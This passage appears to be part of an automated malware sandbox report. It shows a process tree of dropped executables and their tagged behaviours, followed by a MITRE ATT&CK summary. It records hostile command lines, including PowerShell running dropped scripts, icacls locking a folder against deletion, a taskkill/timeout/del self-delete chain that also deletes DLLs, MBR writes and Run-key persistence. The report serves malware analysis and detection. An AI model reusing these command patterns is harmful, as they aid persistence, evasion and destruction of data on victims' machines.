C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn7E93.tmp\tempfile.ps1"11⤵PID:188
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn7E93.tmp\tempfile.ps1"11⤵PID:2416
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn7E93.tmp\tempfile.ps1"11⤵PID:3820
-
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun195a1614ec24e6a.exe4⤵
- Loads dropped DLL
PID:1672 -
C:\Users\Admin\AppData\Local\Temp\7zS01522F12\Sun195a1614ec24e6a.exeSun195a1614ec24e6a.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1772
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS01522F12\Sun1908b94df837b3158.exeSun1908b94df837b3158.exe1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:1824
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
PID:3156 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding D0A512C4760EDC850E5FA4B6A88117D7 C2⤵PID:1940
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding D4D915346E964EAA4ADF1CAD058CA7DC2⤵
- Blocklisted process makes network request
PID:2188 -
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
PID:3600
-
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding C9466F1DDB24ED56BA8622D02795DDDE M Global\MSI00002⤵PID:3472
-
-
C:\Users\Admin\AppData\Local\Temp\6279.exeC:\Users\Admin\AppData\Local\Temp\6279.exe1⤵
- Executes dropped EXE
PID:3968
-
C:\Windows\system32\taskeng.exetaskeng.exe {7204D180-601F-4020-A627-ABC09B46883A} S-1-5-21-2455352368-1077083310-2879168483-1000:QWOCTUPM\Admin:Interactive:[1]1⤵PID:3872
-
C:\Users\Admin\AppData\Roaming\athjitfC:\Users\Admin\AppData\Roaming\athjitf2⤵
- Executes dropped EXE
PID:3988
-
-
C:\Users\Admin\AppData\Local\Temp\B6B2.exeC:\Users\Admin\AppData\Local\Temp\B6B2.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3600 -
C:\Users\Admin\AppData\Local\Temp\B6B2.exeC:\Users\Admin\AppData\Local\Temp\B6B2.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
PID:2240 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\1d6eede1-5293-4349-a43e-2da724a3f71a" /deny *S-1-1-0:(OI)(CI)(DE,DC)3⤵
- Modifies file permissions
PID:2532
-
-
C:\Users\Admin\AppData\Local\Temp\B6B2.exe"C:\Users\Admin\AppData\Local\Temp\B6B2.exe" --Admin IsNotAutoStart IsNotTask3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1528 -
C:\Users\Admin\AppData\Local\Temp\B6B2.exe"C:\Users\Admin\AppData\Local\Temp\B6B2.exe" --Admin IsNotAutoStart IsNotTask4⤵
- Executes dropped EXE
PID:3540 -
C:\Users\Admin\AppData\Local\b3e25be6-5aec-41f3-aa09-e3443bc7e8bc\build2.exe"C:\Users\Admin\AppData\Local\b3e25be6-5aec-41f3-aa09-e3443bc7e8bc\build2.exe"5⤵
- Suspicious use of SetThreadContext
PID:632 -
C:\Users\Admin\AppData\Local\b3e25be6-5aec-41f3-aa09-e3443bc7e8bc\build2.exe"C:\Users\Admin\AppData\Local\b3e25be6-5aec-41f3-aa09-e3443bc7e8bc\build2.exe"6⤵PID:2968
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2968 -s 8927⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
PID:3564
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ED6C.exeC:\Users\Admin\AppData\Local\Temp\ED6C.exe1⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
PID:2412
-
C:\Users\Admin\AppData\Local\Temp\5DCB.exeC:\Users\Admin\AppData\Local\Temp\5DCB.exe1⤵
- Executes dropped EXE
PID:2024
-
C:\Users\Admin\AppData\Local\Temp\B4B2.exeC:\Users\Admin\AppData\Local\Temp\B4B2.exe1⤵
- Executes dropped EXE
- Checks processor information in registry
PID:1364 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im B4B2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\B4B2.exe" & del C:\ProgramData\*.dll & exit2⤵PID:3248
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im B4B2.exe /f3⤵
- Kills process with taskkill
PID:3552
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 63⤵
- Delays execution with timeout.exe
PID:864
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {BD51D8A5-75B8-42CF-8FD3-6E087DC6B1D9} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:3976
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 115 -t 80802⤵PID:3460
-
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 114 -t 80802⤵PID:3860
-
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 113 -t 80802⤵PID:3980
-
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 112 -t 80802⤵PID:1152
-
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 111 -t 80802⤵PID:3896
-
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 110 -t 80802⤵PID:3660
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:2304 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:3224
-
Network
MITRE ATT&CK Enterprise v6
Defense Evasion
File and Directory Permissions Modification
1Install Root Certificate
1Modify Registry
3Virtualization/Sandbox Evasion
1Web Service
1